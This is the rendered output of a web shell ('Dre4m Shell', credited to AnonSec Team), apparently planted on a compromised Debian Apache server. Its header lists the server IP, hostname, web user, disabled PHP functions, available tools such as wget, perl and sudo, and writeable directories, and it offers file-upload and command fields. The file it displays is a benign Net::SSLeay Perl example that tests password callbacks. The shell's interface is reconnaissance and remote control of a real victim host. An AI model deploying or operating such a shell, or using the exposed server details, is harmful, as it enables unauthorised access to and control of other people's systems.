Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.225.56.120
Web Server : Apache/2.4.61 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/share/doc/libnet-ssleay-perl/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/share/doc/libnet-ssleay-perl/examples/passwd-cb.pl
#!/usr/bin/perl
# passwd-cb.pl
#
# Check using password callbacks to decrypt private keys
# $Id: passwd-cb.pl,v 1.2 2002/06/05 18:25:47 sampo Exp $

use Socket;
use Net::SSLeay qw(die_now die_if_ssl_error);
Net::SSLeay::randomize();
Net::SSLeay::load_error_strings();
Net::SSLeay::SSLeay_add_ssl_algorithms();

my ($key_pem, $password) = @ARGV;

print "Keyfile: `$key_pem', pw: `$password'\n";
$calls = 0;

sub callback {
    $calls++;
    print "Callback `$password'\n";
    return $password;
}

my $ctx = Net::SSLeay::CTX_new() or die_now("Failed to create SSL_CTX $!");
if (1) {
Net::SSLeay::CTX_set_default_passwd_cb($ctx, \&callback);
}
Net::SSLeay::CTX_use_PrivateKey_file($ctx, $key_pem,
    &Net::SSLeay::FILETYPE_PEM())
    or print "CTX_use_PrivateKey_file failed\n";

print "calls=$calls\n";

#EOF

Anon7 - 2022
AnonSec Team